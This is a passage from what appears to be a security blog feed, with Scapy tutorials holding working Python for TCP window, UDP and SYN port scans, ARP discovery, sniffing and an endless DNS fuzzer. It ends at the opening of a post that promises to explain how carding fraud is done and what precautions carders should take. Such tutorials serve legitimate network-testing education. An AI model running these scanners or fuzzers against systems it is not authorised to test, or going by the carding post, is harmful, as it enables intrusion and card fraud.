<code class="python plain">window_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"A"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code> <code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(window_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code> <code class="python string">"No response"</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(window_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(window_scan_resp.getlayer(TCP).window </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
<div class="line number17 index16 alt2">
<code class="python keyword">elif</code><code class="python plain">(window_scan_resp.getlayer(TCP).window > </code><code class="python value">0</code><code class="python plain">):</code></div>
<div class="line number18 index17 alt1">
<code class="python functions">print</code> <code class="python string">"Open"</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>UDP scan<br />
</strong></span><br />
TCP is a connection-oriented protocol and UDP is a connection-less protocol.<br />
A connection-oriented protocol is a protocol in which a communication
channel should be available between the client and server and only then
is a further packet transfer made. If there is no communication channel
between the client and the server, then no further communication takes
place.<br />
A Connection-less protocol is a protocol in which a packet transfer
takes place without checking if there is a communication channel
available between the client and the server. The data is just sent on to
the destination, assuming that the destination is available.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin18.jpg" width="621" /><br />
The client sends a UDP packet with the port number to connect to. If
the server responds to the client with a UDP packet, then that
particular port is open on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin19.jpg" width="621" /><br />
<a href="https://www.blogger.com/null" name="resume"></a>The client sends a UDP packet and the port
number it wants to connect to, but the server responds with an ICMP port
unreachable error type 3 and code 3, meaning that the port is closed on
the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin20.jpg" width="621" /><br />
If the server responds to the client with an ICMP error type 3 and
code 1, 2, 9, 10, or 13, then that port on the server is filtered.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin21.jpg" width="621" /><br />
If the server sends no response to the client’s UDP request packet
for that port, it can be concluded that the port on the server is either
open or filtered. No final state of the port can be decided.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_898481">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
<div class="line number24 index23 alt1">
24</div>
<div class="line number25 index24 alt2">
25</div>
<div class="line number26 index25 alt1">
26</div>
<div class="line number27 index26 alt2">
27</div>
<div class="line number28 index27 alt1">
28</div>
<div class="line number29 index28 alt2">
29</div>
<div class="line number30 index29 alt1">
30</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">53</code></div>
<div class="line number10 index9 alt1">
<code class="python plain">dst_timeout</code><code class="python keyword">=</code><code class="python value">10</code></div>
<div class="line number11 index10 alt2">
</div>
<div class="line number12 index11 alt1">
<code class="python keyword">def</code> <code class="python plain">udp_scan(dst_ip,dst_port,dst_timeout):</code></div>
<div class="line number13 index12 alt2">
<code class="python plain">udp_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">UDP(dport</code><code class="python keyword">=</code><code class="python plain">dst_port),timeout</code><code class="python keyword">=</code><code class="python plain">dst_timeout)</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">if</code> <code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(udp_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number15 index14 alt2">
<code class="python plain">retrans </code><code class="python keyword">=</code> <code class="python plain">[]</code></div>
<div class="line number16 index15 alt1">
<code class="python keyword">for</code> <code class="python plain">count </code><code class="python keyword">in</code> <code class="python functions">range</code><code class="python plain">(</code><code class="python value">0</code><code class="python plain">,</code><code class="python value">3</code><code class="python plain">):</code></div>
<div class="line number17 index16 alt2">
<code class="python plain">retrans.append(sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">UDP(dport</code><code class="python keyword">=</code><code class="python plain">dst_port),timeout</code><code class="python keyword">=</code><code class="python plain">dst_timeout))</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">for</code> <code class="python plain">item </code><code class="python keyword">in</code> <code class="python plain">retrans:</code></div>
<div class="line number19 index18 alt2">
<code class="python keyword">if</code> <code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(item))!</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number20 index19 alt1">
<code class="python plain">udp_scan(dst_ip,dst_port,dst_timeout)</code></div>
<div class="line number21 index20 alt2">
<code class="python keyword">return</code> <code class="python string">"Open|Filtered"</code></div>
<div class="line number22 index21 alt1">
<code class="python keyword">elif</code> <code class="python plain">(udp_scan_resp.haslayer(UDP)):</code></div>
<div class="line number23 index22 alt2">
<code class="python keyword">return</code> <code class="python string">"Open"</code></div>
<div class="line number24 index23 alt1">
<code class="python keyword">elif</code><code class="python plain">(udp_scan_resp.haslayer(ICMP)):</code></div>
<div class="line number25 index24 alt2">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(udp_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(udp_scan_resp.getlayer(ICMP).code)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code><code class="python plain">):</code></div>
<div class="line number26 index25 alt1">
<code class="python keyword">return</code> <code class="python string">"Closed"</code></div>
<div class="line number27 index26 alt2">
<code class="python keyword">elif</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(udp_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(udp_scan_resp.getlayer(ICMP).code) </code><code class="python keyword">in</code> <code class="python plain">[</code><code class="python value">1</code><code class="python plain">,</code><code class="python value">2</code><code class="python plain">,</code><code class="python value">9</code><code class="python plain">,</code><code class="python value">10</code><code class="python plain">,</code><code class="python value">13</code><code class="python plain">]):</code></div>
<div class="line number28 index27 alt1">
<code class="python keyword">return</code> <code class="python string">"Filtered"</code></div>
<div class="line number29 index28 alt2">
</div>
<div class="line number30 index29 alt1">
<code class="python plain">udp_scan(dst_ip,dst_port,dst_timeout)</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
Explanation of some functions and variables used in the above codes:<br />
<div>
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 125px;"></col>
<col style="width: 514px;"></col></colgroup>
<tbody valign="top">
<tr>
<td style="border-bottom: solid #4f81bd 2.25pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: solid #4f81bd 1.0pt; padding-left: 7px; padding-right: 7px;"><strong>Function/Variable</strong></td>
<td style="border-bottom: solid #4f81bd 2.25pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: solid #4f81bd 1.0pt; padding-left: 7px; padding-right: 7px;"><strong>Explanation</strong></td>
</tr>
<tr style="background: #d3dfee;">
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>RandShort()</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">Generates a random number</td>
</tr>
<tr>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>type()</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">Gets the type of data in a particular variable; it is passed as an argument</td>
</tr>
<tr style="background: #d3dfee;">
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>sport</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">The source port number</td>
</tr>
<tr>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>dport</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">The destination port number</td>
</tr>
<tr style="background: #d3dfee;">
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>timeout</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">The amount of time to wait for the response of a sent request packet</td>
</tr>
<tr>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>haslayer()</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">To find a particular layer like TCP or UDP or ICMP is present of not inside a packet</td>
</tr>
<tr style="background: #d3dfee;">
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>getlayer()</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">To get the a particular value from a layer like TCP or UDP or ICMP present inside a packet</td>
</tr>
</tbody>
</table>
</div>
This concept of scanning has been used in the “multiport scanner available at:<br />
<a href="https://github.com/interference-security/Multiport">https://github.com/interference-security/Multiport</a><br />
You can go ahead and see the same implementation of port scanning in this project.<br />
Scapy is a very easy to use tool and makes it really simple to create
your own packets and understand what request packet is being sent and
what response packet is being received.<br />
<span style="text-decoration: underline;"><strong>References:<br />
</strong></span><br />
<ol>
<li><a href="http://www.secdev.org/projects/scapy/doc/">http://www.secdev.org/projects/scapy/doc/</a></li>
<li><a href="http://nmap.org/book/man-port-scanning-techniques.html">http://nmap.org/book/man-port-scanning-techniques.html</a></li>
</ol>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-62381265069659394342016-12-13T23:58:00.000+05:302016-12-13T23:58:29.580+05:30Scapy: All-in-One Networking Tool<div dir="ltr" style="text-align: left;" trbidi="on">
A network is an essential part of any cyber infrastructure. There are
various tools available for the networking part of pentesting and other
security assessment tasks like Nmap, tcpdump, arpspoof, etc., but one
tool which stands out of all is Scapy.<br />
Scapy is a powerful interactive packet manipulation tool written in
Python, and the best part is that it can also be utilized as a library
in Python programs, which provides the pentester the ability to create
his/her own tool based on the requirement. In this article we will
discuss how we can use Scapy as an interactive tool as well as a library
in our programs (Python). It allows us to sniff, create, send and slice
packets for analysis.<br />
Most of the tools are built with something specific in mind, like
Nmap for network scanning or Wireshark for sniffing, but Scapy allows us
to build something new utilizing its functionalities and hence opens up
a whole new world of networking applications. Unlike other tools which
provide an interpreted output of the query, Scapy will present a raw
output of any query that we make and let us decide what we need out of
it and how to interpret it. This specific advantage of the tool is very
helpful during the advanced analysis of the network. Using Scapy we can
create and send custom packets over the network and analyze the raw
output received with a minimal amount of lines of code, and it supports a
wide range of protocols for the purpose.<br />
Before going into the details of Scapy, here are few terminologies that need to be discussed:<br />
<ul>
<li>Scanning: The act of probing a host machine to identify any specific detail about it. Eg. Port scanning.</li>
<li>Sniffing: The act of intercepting and logging the packets which flow across the network.</li>
<li>Fuzzing: A software testing technique in which random data is passed as input to a computer application to check its stability.</li>
</ul>
Scapy provides various commands from basic to advanced level for
probing a network. Let’s start with some basic commands for interactive
usage:<br />
<ul>
<li><strong>>>> ls(): Displays all the protocols supported by Scapy, as shown in figure 1.</strong></li>
<li><strong>>>> <span style="color: black;">lsc(): Displays the list of commands supported by Scapy, as shown in figure 2.</span></strong></li>
<li><strong>>>> conf: Displays configurations options.</strong></li>
<li><strong>>>> help(): Display help on a specific command. Usage example: help(sniff)</strong></li>
<li><strong>>>> show(): Display the details about a specific packet. Usage example: Newpacket.show()</strong></li>
</ul>
Using the above mentioned command would be helpful to further explore the tool.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO1.png" /><br />
<div style="text-align: center;">
Figure 1. Output of commands ls() and conf</div>
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO2.png" /><br />
<div style="text-align: center;">
Figure 2. Output of command lsc()</div>
Scapy allows us to create custom packets based on the huge set of
protocols that it supports. Let us see how we can create simple packets:<br />
<strong>>>> Newpacket=IP(dst=’google.com’)<br />
</strong><br />
<strong>>>> Newpacket.ttl=10<br />
</strong><br />
<strong>>>> Newpacket.show()<br />
</strong><br />
We can also create sets of packets based on our requirements. Here is
an example of simple IP packets for different port addresses.<br />
<strong>>>> basepkt=IP(dst= “www.google.com”)<br />
</strong><br />
<strong>>>> pktport=TCP(dport=[80,443])<br />
</strong><br />
<strong>>>> [p for p in basepkt/pktport]<br />
</strong><br />
Now when we have created packets we need to send these packets over the network. We have two options for this purpose:<br />
<ul>
<li>send(), which is a layer 3 send. It decides the routing based on local table.</li>
<li>sendp(), which is a layer 2 send.</li>
</ul>
To send our packet we are using send(), as shown in figure 3:<br />
<strong>>>> send(Newpacket)<br />
</strong><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO3.png" /><br />
<div style="text-align: center;">
Figure 3. Packet creation and sending</div>
To see if the packet is really sent we can utilize any sniffer like
Wireshark or tcpdump. Although Scapy also provides the functionality of
sniffing, which we will see later in the article.<br />
We can create a ping echo request packet by simply adding the ICMP protocol after our previous packet.<br />
<strong>>>> Newpacket=IP(dst=”google.com”)/ICMP()<br />
</strong><br />
The operator ‘/’ is used as a composite operator between two layers.<br />
We can send this packet similar to our previous packet. To send the
same packet again and again we can simply add the loop=1 argument with
the send packet.<br />
<strong>>>> send(Newpacket, loop=1)<br />
</strong><br />
As we have seen how to create simple packets and send them, now we
should see how to send and also receive packets. This functionality is
very useful when we need to send some packets and we expect a response
for those packets, like an ARP request. Again there are two types based
on the layers the packets are sent and received:<br />
Layer3:<br />
<ul>
<li>sr(): It returns the answered and unanswered packets</li>
<li>sr1(): It returns only answered and sent packets</li>
</ul>
Layew2:<br />
<ul>
<li>srp():It returns the answered and unanswered packets</li>
<li>srp1(): It returns only answered and sent packets</li>
</ul>
Let’s see an example of the sr function.<br />
<strong>>>> output=sr(IP(dst=”google.com”)/ICMP())<br />
</strong><br />
<strong>output<br />
</strong><br />
We see that the ‘output’ contains two different results, ‘Results’
and ‘Unanswered’. The first part contains the packets received as
response and the second part contains the packets which were not
answered. So we can divide it into two parts:<br />
<strong>>>> result, unanswered=output<br />
</strong><br />
<strong>>>> result<br />
</strong><br />
The output of the result shows that we got one ICMP packet as a
reply, so we can see the raw packet we got in response by using the
following command, as shown in figure 4.<br />
<strong>>>> result[0]<br />
</strong><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO4.png" /><br />
<div style="text-align: center;">
Figure 4. Sending and receiving packets</div>
If we look closely we can see that this is an echo reply packet for
our echo request. Now if we want to see the current routing table of our
machine, we can use the command:<br />
<strong>>>> conf.route<br />
</strong><br />
Scapy allows us to include user specified routes to this table,
without affecting the original table, this can be done by using the add
function.<br />
<strong>>>> conf.route.add(host=”192.168.118.2″, gw=”192.168.118.25″)<br />
</strong><br />
Now any packet intended for the host 192.168.118.2 would go through 192.168.118.25<br />
After we are done using this table we can get back to the original
table simply by using the resync function, as displayed in figure 5.<br />
<strong>>>> conf.route.resync()<br />
</strong><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO5.png" /><br />
<div style="text-align: center;">
Figure 5. Configuring the routing table</div>
Now that we have seen how to create simple packets, send them and
receive them, let’s move forward to packet sniffing, so that we can
analyze what is happening over the network . Packet sniffing can be done
by the simple function sniff:<br />
<strong>>>> a=sniff(filter=”icmp”, iface=”eth1″, timeout=10, count=3)<br />
</strong><br />
<strong>>>> a.summary()<br />
</strong><br />
<strong>>>> a[1]<br />
</strong><br />
As demonstrated in the example, the sniff function can sniff the
packets and can also filter them based on the user requirements. Now to
see the output in real time we can use the lambda function along with
the show or summary function based on the amount of detail we require.<br />
<strong>>>> a=sniff(filter=”icmp”, iface=”eth1″, count=3, timeout=10, prn=lambda x:x.summary())<br />
</strong><br />
Now as we have seen how easily we can sniff packets using Scapy, we
also need to learn how to save these packets for later analysis and also
how to read those saved files.<br />
To save packets we can use the function wrpacp as shown below:<br />
<strong>>>> wrpcap(“mypackets.pcap”, a)<br />
</strong><br />
Now if we need to read these packets we can simply use the function
rdpcap, as shown in figure 6. As pcap format is supported by many
sniffers like Wireshark, tcpdump etc., we can also analyze these files
using them.<br />
<strong>>>> rdpkt=rdpcap(“mypackets.pcap”)<br />
</strong><br />
<strong>>>> rdpkt.show()<br />
</strong><br />
<strong>>>> rdpkt[1]<br />
</strong><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO6.png" /><br />
<div style="text-align: center;">
Figure 6. Sniffing, writing and reading packets</div>
As Scapy allows us to create custom packets, we can utilize this
functionality to perform port scanning. Here is an example of how to
perform some simple port scanning using the interactive interface. We
will create a TCP/IP packet with the TCP flag set as ‘S’ (SYN) for port
1-1024.<br />
<strong>>>> res,unans = sr( IP(dst=”192.168.118.1″)/TCP(flags=”S”, dport=(1,1024)))<br />
</strong><br />
The output can be analyzed by using the command<br />
<strong>>>> res.summary()<br />
</strong><br />
Apart from packet creation, Scapy can also perform simple networking
functions such as ping, traceroute etc. Example of a simple traceroute
of google.com is shown here:<br />
<strong>>>> traceroute(“www.google.com”)<br />
</strong><br />
Scapy also contains commands for some network based attacks such as
arpcachepoison, etherleak, srpflood etc. These commands can be very
useful during a network security analysis. If we need to discover the
hosts on the local Ethernet we can use the command arping.<br />
<strong>>>> arping(192.168.118.*)<br />
</strong><br />
Scapy also provides the functionality of fuzzing, utilizing the function fuzz, here is the example of a simple DNS fuzzer:<br />
<strong>>>> send(IP(dst=”192.168.118.1″)/UDP()/fuzz(DNS()), inter=1,loop=1)<br />
</strong><br />
We have seen how we can use Scapy as a tool and use its various
functions interactively. Now let’s see how to use Scapy in Python
programs, through simple example codes. The example codes demonstrate
how easily we can create programs in Python using the Scapy library and
create powerful tools with minimum amount of coding.<br />
The code shown below is a simple Python program which sends ARP requests and waits for response and displays the response.<br />
<strong>#!/usr/bin/python<br />
</strong><br />
<strong>#import sys module for command line argument<br />
</strong><br />
<strong>import sys<br />
</strong><br />
<strong>#import scapy as a library<br />
</strong><br />
<strong>from scapy.all import *<br />
</strong><br />
<strong>print “Usage: scapy-arping eg: ./scapy-arping.py 192.168.1.0/24”<br />
</strong><br />
<strong>#create and send ARP request packets<br />
</strong><br />
<strong>rec,unans=srp(Ether(dst=”ff:ff:ff:ff:ff:ff”)/ARP(pdst=sys.argv[1]),timeout=2)<br />
</strong><br />
<strong>#print the result<br />
</strong><br />
<strong>for send,recv in rec:<br />
</strong><br />
<strong> print recv.sprintf(r”MAC: “+”%Ether.src%”+” <–> IP: “+” %ARP.psrc%”)<br />
</strong><br />
The example output of this program is shown below:<br />
<strong>root@bt:~/Desktop# ./scapy-arping.py 192.168.118.0/24<br />
</strong><br />
<strong>WARNING: No route found for IPv6 destination :: (no default route?)<br />
</strong><br />
<strong>Usage: scapy-arping eg: ./scapy-arping.py 192.168.1.0/24<br />
</strong><br />
<strong>Begin emission:<br />
</strong><br />
<strong>**Finished to send 256 packets.<br />
</strong><br />
<strong>*<br />
</strong><br />
<strong>Received 3 packets, got 3 answers, remaining 253 packets<br />
</strong><br />
<strong>MAC: 00:50:56:f5:48:7a <–> IP: 192.168.118.2<br />
</strong><br />
<strong>MAC: 00:50:56:c0:00:08 <–> IP: 192.168.118.1<br />
</strong><br />
<strong>MAC: 00:50:56:f8:5e:b3 <–> IP: 192.168.118.254<br />
</strong><br />
Another example code for a simple ARP monitor is shown below (source: <a href="http://www.secdev.org/projects/scapy/doc/usage.html">http://www.secdev.org/projects/scapy/doc/usage.html#recipes</a>). The program simply monitors for any ARP request or reply and prints the associate MAC and IP address.<br />
<strong>#! /usr/bin/env python<br />
</strong><br />
<strong>from scapy.all import *<br />
</strong><br />
<strong>def arp_monitor_callback(pkt):<br />
</strong><br />
<strong> if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at<br />
</strong><br />
<strong> return pkt.sprintf(“%ARP.hwsrc% %ARP.psrc%”)<br />
</strong><br />
<strong>sniff(prn=arp_monitor_callback, filter=”arp”, store=0)<br />
</strong><br />
<strong>Example output for the program is shown below:<br />
</strong><br />
<strong>root@bt:~/Desktop# ./arpmonitor.py<br />
</strong><br />
<strong>WARNING: No route found for IPv6 destination :: (no default route?)<br />
</strong><br />
<strong>00:50:56:c0:00:08 192.168.118.1<br />
</strong><br />
<strong>00:0c:29:d8:b6:4d 192.168.118.130<br />
</strong><br />
<strong>00:0c:29:d8:b6:4d 192.168.118.130<br />
</strong><br />
<strong>00:50:56:c0:00:08 192.168.118.1<br />
</strong><br />
Let’s see how we can create a simple DNS fuzzer using the fuzz function demonstrated in the description above.<br />
<strong>#!/usr/bin/env python<br />
</strong><br />
<strong>#import module sys for command line argument<br />
</strong><br />
<strong>import sys<br />
</strong><br />
<strong>#import scapy as a library<br />
</strong><br />
<strong>from scapy.all import *<br />
</strong><br />
<strong>#fuzz dns<br />
</strong><br />
<strong>while True:<br />
</strong><br />
<strong> sr(IP(dst=sys.argv[1])/UDP()/fuzz(DNS()),inter=1,timeout=1)<br />
</strong><br />
<strong>Sample output of the DNS fuzzer created using scapy.<br />
</strong><br />
<strong>root@bt:~/Desktop# ./dnsfuzzer.py 192.168.118.1<br />
</strong><br />
<strong>WARNING: No route found for IPv6 destination :: (no default route?)<br />
</strong><br />
<strong>Begin emission:<br />
</strong><br />
<strong>.Finished to send 1 packets.<br />
</strong><br />
<strong>Received 1 packets, got 0 answers, remaining 1 packets<br />
</strong><br />
<strong>Begin emission:<br />
</strong><br />
<strong>Finished to send 1 packets.<br />
</strong><br />
<strong>Received 0 packets, got 0 answers, remaining 1 packets<br />
</strong><br />
<strong>Begin emission:<br />
</strong><br />
<strong>Finished to send 1 packets.<br />
</strong><br />
<strong>Received 0 packets, got 0 answers, remaining 1 packets<br />
</strong><br />
<strong>[…]<br />
</strong><br />
The output of all the sample programs is shown in figure 7.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO7.png" /><br />
<div style="text-align: center;">
Figure 7. Programs using Scapy</div>
There are many other third party libraries available for packet
manipulation in Python, like Pycapy, pypcap, dpkt, etc., yet Scapy turns
out be one of the simplest to use and integrate into Python code and
hence is widely used. There are many other functionalities provided by
Scapy, which individually might seem very simple, but once they all are
weaved together, they have the capabilities which no other tool
provides.<br />
<strong>Conclusion<br />
</strong><br />
We saw that Scapy is very powerful yet easy to use. Scapy is actually
not a replacement for tools like Nmap, tcpdump or p0f. These tools are
developed for specific needs and they all perform their functions very
well. During a quick security assessment they come in handy and provide
us the desired result, but sometimes we need the raw outputs, without
any interpretation so that we can analyze and make decisions for
ourselves. For example if we need to check if the system we are trying
to parse is actually a honeypot or not, another example would be to test
how a firewall/ IDP/ IPS behaves for different types of custom packets,
then tools like Scapy are very useful.<br />
The best thing about Scapy is that we can also use it as a Python
library, which allows us to create networking tools very quickly without
going into the details of creating raw packets from scratch, which
considerably reduces the size of the code. It simply allows us try
anything we can imagine over a network. The inbuilt functions like fuzz,
sniff, traceroute, arping, etc. wipe out the need of different tools
for different functions and integrate it all into a single package.</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-1721645910103321772016-12-13T23:50:00.000+05:302016-12-13T23:50:36.112+05:30Introduction to carding <div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
<span style="color: red;">Disclaimer:</span></h1>
<span style="color: red;">
</span><em><span style="color: red;">The Article writer’s intent is to spread awareness about the
carding. The writer is not responsible if any damage occurs. This is for
educational purpose only.</span><br />
</em><br />
Hello Guys, if you were a victim of carding fraud or really want to
understand what is Carding and how it should be done then here I
prepared the document which will clear the basic understanding.<br />
Points I cover:<br />
<ol>
<li>What is carding?</li>
<li>What are the factors relates to carding?</li>
<li>How it’s done, I mean process?</li>
<li>Precautionary measures Carder should take.</li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar1.jpg" /></div>
<h1>
Overview:</h1>
Nowadays, if we see the credit card fraud trend, it is being
increased day by day and new techniques being discovered to hack the
credit card info and use it for malicious purpose.<br />
As everything goes cashless, the use of a credit card will be
necessary for everyone. This is reason people should be aware of how
carding fraud is done and learn how to become not to become a <span style="text-decoration: underline;">victim</span>.<br />
There are so many ways to get the credit card details available on
the internet through Darknet sites as well as on TOR sites (Data Leak
.etc.).<br />
My aim is to spread awareness about carding, what is it, how the carder does it, etc.<br />
I have referred many articles, sites and basic documentation which I
feel will be useful to share it with you. I want the normal user to be
aware of carding methods so they can be alert to it.<br />
As we can see on social media sites and groups, most of the carders
provide the offers which are collected from Online Sites and groups for
your reference:<br />
Be aware that you should never contact a ripper. A <strong>Ripper</strong> is a fraud who takes the money and never deliver the product.<br />
